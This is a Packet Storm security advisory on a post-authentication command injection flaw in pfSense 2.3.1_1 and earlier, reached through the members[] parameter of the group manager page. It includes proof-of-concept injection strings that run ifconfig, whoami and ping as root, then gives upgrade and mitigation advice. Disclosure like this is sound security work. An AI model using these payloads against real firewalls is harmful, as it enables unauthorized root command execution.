pfSense 2.3.1_1 Post-Authentication Command Execution

2017-11-07T00:00:00
ID PACKETSTORM:144916
Type packetstorm
Reporter s4squatch
Modified 2017-11-07T00:00:00

Description

                                        
                                            `# Exploit Title: pfSense <= 2.3.1_1 Post-Auth Command Execution  
# Date: 11-06-2017  
# Exploit Author: s4squatch (Scott White - www.trustedsec.com)  
# Vendor Homepage: https://www.pfsense.org  
# Version: 2.3-RELEASE  
# Vendor Security Advisory: https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc  
  
1. Description  
pfSense <= 2.3.1_1 is affected by a post-authetication os command injection vulnerability in auth.inc via the /system_groupmanager.php page (System menu-->User Manager-->Groups) in the handling of the members[] parameter. This allows an authenticated WebGUI user with  
privileges for system_groupmanager.php to execute commands in the context of the root user.  
  
2. Proof of Concept  
'`ifconfig>/usr/local/www/ifconfig.txt`'  
'`whoami>/usr/local/www/whoami.txt`'  
  
Command output can then be viewed at the webroot:  
http://<address>/ifconfig.txt  
http://<address>/whoami.txt  
  
Another POC: 0';/sbin/ping -c 10 192.168.1.125;'  
  
3. Solution  
Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be performed in the web interface or from  
the console. See https://doc.pfsense.org/index.php/Upgrade_Guide Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question.  
  
Issue was responsibly disclosed to pfSense (security@pfsense.org) on 06/08/2016 and fixed 06/09/2016!  
Thank you to Jim P and the pfSense team for the impressive response time.  
  
`